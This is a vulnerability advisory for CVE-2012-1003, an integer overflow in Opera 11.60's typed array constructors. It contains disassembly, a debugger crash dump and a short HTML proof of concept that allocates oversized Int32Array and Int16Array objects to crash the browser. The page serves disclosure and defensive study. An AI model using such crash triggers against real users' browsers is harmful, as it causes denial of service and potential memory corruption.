Opera 11.60 Array Integer Overflow

2012-02-04 / 2012-08-15
Credit: Code Audit Labs
Risk: Medium
Local: No
Remote: No
CVE: CVE-2012-1003
CWE: CWE-189


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

CAL-2012-0004 opera array integer overflow 1 Affected Products ================= 11.60 and prior 2 Vulnerability Details ===================== Code Audit Labs http://www.vulnhunt.com has discovered a integer overflow vulnerability in array functions like Int32Array,Int16Array... . Opear vendor say "We have reproduced the problem, and determined that it does not have any security implications, since the crash is a caused by a memory fill operation which the webpage have no control over, and this operation will always crash. It is therefore classified as a stability issue, not a security issue. " we still insist on that it is a security issue or not should accord to root cause of this bug instead of is it exploitable or not. because you think it is unexploitable, someone can exploit it via deeply research. So if most people of Security Community think this is a security issue, please assign to a CVE number. 3 Analysis ========= Int16Array(2147483647) example memory corrupt happen if satisfy with following Conditions 1: x*2 >2 2:x*2!=00 3: (x*2-1)+0x1f overflow 32bits. so the length of malloc is (x*2-1)+0x1f memset(eax+0x10,0,x*2) cause memory corrupt text:5C769F57 .text:5C769F57 loc_5C769F57: ; CODE XREF: sub_5C769DCE+17Cj .text:5C769F57 mov eax, [esp+48h+var_20] ; var_20 is 2 .text:5C769F5B imul eax, [esp+48h+var_3C] ; var_3C is 80000001 .text:5C769F60 cmp eax, [esp+48h+var_3C] .text:5C769F64 jb short loc_5C769F37 .text:5C769F66 mov [esp+48h+size], eax .text:5C769F6A mov eax, [ebp+arg_0] .text:5C769F6D call sub_5C14A6E8 .text:5C769F72 push [esp+48h+size] ; size .text:5C769F76 push dword ptr [eax] ; int .text:5C769F78 push [ebp+arg_0] ; int .text:5C769F7B call sub_5C765B6D .text:5C769F80 add esp, 0Ch ... .text:5C46A598 .text:5C46A598 arg_0 = dword ptr 4 .text:5C46A598 size = dword ptr 8 .text:5C46A598 .text:5C46A598 mov edx, [esp+arg_0] .text:5C46A59C push esi .text:5C46A59D mov esi, [esp+4+size] .text:5C46A5A1 test esi, esi .text:5C46A5A3 jz short loc_5C46A5AA .text:5C46A5A5 lea eax, [esi-1] .text:5C46A5A8 jmp short loc_5C46A5AC .text:5C46A5AA ; --------------------------------------------------------------------------- .text:5C46A5AA .text:5C46A5AA loc_5C46A5AA: ; CODE XREF: sub_5C46A598+Bj .text:5C46A5AA xor eax, eax .text:5C46A5AC .text:5C46A5AC loc_5C46A5AC: ; CODE XREF: sub_5C46A598+10j .text:5C46A5AC mov ecx, [edx+8] .text:5C46A5AF add eax, 1Fh .text:5C46A5B2 push 0 .text:5C46A5B4 and eax, 0FFFFFFF8h .text:5C46A5B7 push eax .text:5C46A5B8 push edx .text:5C46A5B9 call sub_5C019DA0 ext:5C765BF7 loc_5C765BF7: ; CODE XREF: sub_5C765B6D+50j .text:5C765BF7 push [ebp+size] ; size .text:5C765BFA lea eax, [ebx+10h] .text:5C765BFD push 0 ; c .text:5C765BFF push eax ; dst .text:5C765C00 call memset 4 Exploitable? ============ who known? 5 Crash info: =============== (d10.ff4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8 edi=03610e68 eip=675b347e esp=02314de0 ebp=02314e24 iopl=0 nv up ei pl nz na pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010207 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Opera\Opera.dll - Opera!OpGetNextUninstallFile+0x1961c: 675b347e 660f7f4150 movdqa xmmword ptr [ecx+50h],xmm0 ds:0023:03680000=???????????????????????????????? 0:000> .exr -1 ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 03680000 Attempt to write to address 03680000 0:000> kp ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 02314e24 00000000 Opera!OpGetNextUninstallFile+0x1961c 6 POC: ==== open a html with following content <script> //????crash Int32Array(1073741823) Float32Array(1073741823) Float64Array(1073741823) Int32Array(1073741823) Uint32Array(1073741823) Int16Array(2147483647) ArrayBuffer(4294967295) </script> 7 About Code Audit Labs: ===================== Code Audit Labs secure your software,provide Professional include source code audit and binary code audit service. Code Audit Labs:" You create value for customer,We protect your value" http://www.VulnHunt.com

References:

http://www.VulnHunt.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top